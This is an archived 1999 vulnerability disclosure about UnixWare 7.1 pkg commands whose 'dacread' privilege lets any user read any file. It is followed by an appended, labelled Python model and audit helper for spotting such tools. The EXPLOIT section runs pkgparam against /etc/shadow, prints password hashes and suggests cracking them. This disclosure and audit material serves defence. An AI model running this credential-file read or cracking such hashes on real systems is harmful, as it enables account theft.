UnixWare and the dacread permission

From: Brock Tellier (btellierat_private)
Date: Fri Dec 03 1999 - 20:21:17 PST

    Greetings,
    
    OVERVIEW
    Any user may read any file on the system.
    
    BACKGROUND
    Only UnixWare 7.1 has been tested.
    
    DETAILS
    As previously stated, UnixWare binaries gain additional privileges via
    standard suid/sgid AND /etc/security/tcb/privs.  The majority of the UnixWare
    "pkg" commands, such as pkginfo, pkgcat, pkgparam, etc., are vulnerable to a bug
    which will allow any user to read any file on the system as a result of their
    additional "dacread" permission in the privs file.
    
    The dacread permission allows a process to override the Discretionary Access
    Controls (DAC) for read-only operations.  Basically, a process with the
    dacread permissions is able to bypass the mode bits and ownership on a file,
    but only for reading it.  A process with dacwrite permissions can bypass mode
    bits to write to or execute that file.
    
    I'm pretty sure that the bugs I found in the pkg commands were introduced by
    their addition to the privs file.  As far as I can tell, there is virtually no
    reason for them to be able to read any file on the system.  
    
    All around, this additional privilege thing, well, sucks.  Consider now that
    the truss(1) command will allow the user to see any file i/o that happens
    between a process and the system since it isn't suid/sgid.  Thus, if there is
    *any* way that you can make pkg* read from a file, even if the output is never
    printed, you can examine truss output to get the file's contents.
    
    EXPLOIT
    The worst offender of pkg* is pkgparam, which will print the contents of a
    file to stdout, though I've been able to get most of the pkg programs to read
    from /etc/shadow in one way or another and grab the contents with truss.
    
    bash-2.02$ ls -la /bin/pkgparam
    -r-xr-xr-x    1 root     sys          166784 May 21  1999
    /bin/pkgparam
    bash-2.02$ /bin/pkgparam -f /etc/shadow
    Dy0l3OC7XHsj.:10925::::::
    NP:6445::::::
    NP:6445::::::
    NP:6445::::::
    NP:6445::::::
    NP:6445::::::
    NP:6445::::::
    NP:6445::::::
    NP:6445::::::
    NP:6445::::::
    *LK*:::::::
    *LK*:::::::
    *LK*:::::::
    BgusHRQZ9MH2U:10878::::::
    *LK*:::::::
    *LK*:::::::
    *LK*:::::::
    *LK*:::::::
    *LK*:::::::
    nv.Xrh2V3vArc:10882::::::
    ozT.yeRe1/dxY:10882::::::
    RinwpQfqabYbc:10928::::::
    bash-2.02$ 
    Now just concatenate the first field of /etc/passwd with this file and run
    your favorite cracker.
    
    Brock Tellier
    UNIX Systems Administrator
    Chicago, IL, USA
    btellierat_private
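The following is an added illustration and not part of Brock Tellier's post or of UnixWare itself. It is a simplified model of the access check the post describes: a normal discretionary (mode-bit) check, plus the dacread and dacwrite overrides granted through the privs file. The file table, the uid/gid values and the privilege table are all constructed sample data; the function names are assumptions for this example. The point it makes is the defender's one: once a world-executable tool carries dacread, the mode bits on /etc/shadow stop protecting it from whoever can run that tool, so the audit question is simply "which executables everyone can run hold a DAC override?".

```python
# Simplified model of DAC plus the dacread/dacwrite overrides described in the
# advisory.  Not UnixWare's kernel logic; a teaching model with constructed data.

# Constructed sample file metadata: path -> (owner uid, group gid, mode bits)
FILES = {
    "/etc/shadow": (0, 3, 0o400),        # root-only readable
    "/etc/passwd": (0, 3, 0o644),        # world readable
    "/home/brock/notes": (100, 100, 0o600),
}

READ, WRITE, EXEC = "r", "w", "x"
_MASK = {READ: 4, WRITE: 2, EXEC: 1}


def dac_allows(uid, gids, path, op):
    """Plain discretionary check: owner bits, else group bits, else other bits."""
    owner, group, mode = FILES[path]
    if uid == owner:
        bits = (mode >> 6) & 7
    elif group in gids:
        bits = (mode >> 3) & 7
    else:
        bits = mode & 7
    return bool(bits & _MASK[op])


def access_allowed(uid, gids, privs, path, op):
    """DAC check plus the overrides the advisory describes: dacread bypasses
    mode bits for reads only, dacwrite for write and execute."""
    if dac_allows(uid, gids, path, op):
        return True
    if op == READ and "dacread" in privs:
        return True
    if op in (WRITE, EXEC) and "dacwrite" in privs:
        return True
    return False


# Constructed sample privilege table (hypothetical, not the real privs file):
# executable -> (mode bits of the executable, set of privileges it is granted)
PRIV_TABLE = {
    "/bin/pkgparam": (0o555, {"dacread"}),      # world-executable + dacread
    "/bin/pkginfo": (0o555, {"dacread"}),
    "/sbin/backup": (0o500, {"dacread"}),       # root-only executable
    "/bin/ls": (0o555, set()),
}


def universal_readers(priv_table):
    """Audit helper: executables that anyone can run and that hold dacread.
    Each one lets every local user read any file, mode bits notwithstanding."""
    return sorted(
        path for path, (mode, privs) in priv_table.items()
        if "dacread" in privs and (mode & 0o001)
    )


if __name__ == "__main__":
    user, groups = 100, {100}
    print("unprivileged read of /etc/shadow:",
          access_allowed(user, groups, set(), "/etc/shadow", READ))
    print("same read via a dacread tool:   ",
          access_allowed(user, groups, {"dacread"}, "/etc/shadow", READ))
    print("world-executable dacread tools:  ", universal_readers(PRIV_TABLE))
```

The model separates the two checks so the audit function can be reused on a real privilege listing once it is parsed into the same shape; the parsing itself is deliberately left out because the privs file format is not shown in the post.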
    
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:17:00 PDT